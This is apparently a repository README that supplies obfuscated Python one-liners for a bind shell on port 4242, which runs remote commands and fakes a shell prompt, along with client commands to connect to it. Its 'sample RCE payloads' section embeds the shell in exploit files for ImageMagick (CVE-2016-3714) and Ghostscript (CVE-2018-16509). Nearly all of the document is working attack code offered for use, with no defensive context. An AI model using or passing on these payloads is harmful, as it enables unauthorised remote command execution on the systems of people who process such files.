└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # Python one-liner bind shell
 2 | ## The host command (to create a bind shell):
 3 | ### Unix:
 4 | 
 5 | ```
 6 | python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), __after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))"
 7 | ```
 8 | 
 9 | ### Windows:
10 | 
11 | ```
12 | py -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), __after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))"
13 | ```
14 | 
15 | 
16 | 
17 | ## The client command (to connect to the shell):
18 | ### Unix:
19 | #### Python 2:
20 | 
21 | ```
22 | python -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(raw_input(d))]][0] for __g['d'] in [(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(raw_input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))"
23 | ```
24 | 
25 | #### Python 3:
26 | 
27 | ```
28 | python3 -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(input(d))]][0] for __g['d'] in [(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))"
29 | ```
30 | 
31 | 
32 | ### Windows:
33 | #### Python2:
34 | 
35 | ```
36 | py -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(raw_input(d))]][0] for __g['d'] in [(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(raw_input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))"
37 | ```
38 | 
39 | #### Python 3:
40 | 
41 | ```
42 | py -c "(lambda __g, __y: [[[(s.connect((t, 4242)), (lambda __after: __y(lambda __this: lambda: (lambda __break: [[(s.send(b.encode()), (lambda __after: __break() if (b == 'exit') else __after())(lambda: __this()))[1] for __g['b'] in [(input(d))]][0] for __g['d'] in [(s.recv(2048).decode())]][0])(__after) if 1 else __after())())(lambda: None))[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['t'] in [(input('Host: '))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))))"
43 | ```
44 | 
45 | 
46 | ## Sample RCE payloads:
47 | ### CVE-2016-3714:
48 | 
49 | ```
50 | push graphic-context
51 | viewbox 0 0 640 480
52 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), __after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))"`'
53 | pop graphic-context
54 | ```
55 | 
56 | ### CVE-2018-16509:
57 | 
58 | ```
59 | %!PS-Adobe-3.0 EPSF-3.0
60 | %%BoundingBox: -0 -0 100 100
61 | 
62 | userdict /setpagedevice undef
63 | save
64 | legal
65 | { null restore } stopped { pop } if
66 | { legal } stopped { pop } if
67 | restore
68 | mark /OutputFile (%pipe%python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0] if ctypes.windll.shell32.IsUserAnAdmin() else __after())(lambda: [(c.send('%s(c) Microsoft Corporation. All rights reserved.%s'(v, f)), [__after() for __g['r'] in [('Command can not be recognized\n')]][0])[1] for __g['f'] in [(('\nShell\\%s> ' % u))]][0]) for __g['u'] in [(os.getlogin().encode())]][0] for __g['v'] in [(subprocess.check_output('ver', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0] for __g['ctypes'] in [(__import__('ctypes', __g, __g))]][0] if (os.name == 'nt') else [[(lambda __after: [__after() for __g['e'] in [('#')]][0] if (u == 'root') else __after())(lambda: [(c.send(f), [__after() for __g['r'] in [('-sh: command not found\n')]][0])[1] for __g['f'] in [(('%s@%s:%s ' % (u, socket.gethostname().encode(), e)))]][0]) for __g['e'] in [('$')]][0] for __g['u'] in [(subprocess.check_output('whoami', stderr=subprocess.STDOUT, shell=True).replace('\n', ''))]][0])(lambda: (lambda __after: __y(lambda __this: lambda: (lambda __break: [(lambda __after: __break() if (d == 'exit') else __after())(lambda: (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: (c.send(('%s%s' % (b, f))), __this())[1])][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and ([True for __out[0] in [([lambda after: after() for __g['b'] in [(r)]][0])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [([(lambda __after: (os.chdir(d[3:]), __after())[1] if (d[:2] == 'cd') else __after())(lambda: (lambda __after: __after())) for __g['b'] in [(subprocess.check_output(d, stderr=subprocess.STDOUT, shell=True))]][0])]][0]})())))([None])) for __g['d'] in [(c.recv(1024).decode().replace('\n', ''))]][0])(__after) if 1 else __after())())(lambda: None)) for (__g['c'], __g['a']) in [(s.accept())]][0])[1])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0])(globals(), (lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), __import__('contextlib', level=0))") currentdevice putdeviceprops
69 | ```
70 | 


--------------------------------------------------------------------------------